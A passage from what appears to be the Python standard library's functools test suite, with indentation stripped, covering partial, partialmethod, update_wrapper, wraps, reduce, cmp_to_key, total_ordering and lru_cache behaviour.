f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
class TestPartialPy(TestPartial, unittest.TestCase):
partial = staticmethod(py_functools.partial)
if c_functools:
class PartialSubclass(c_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = PartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce(unittest.TestCase):
func = functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
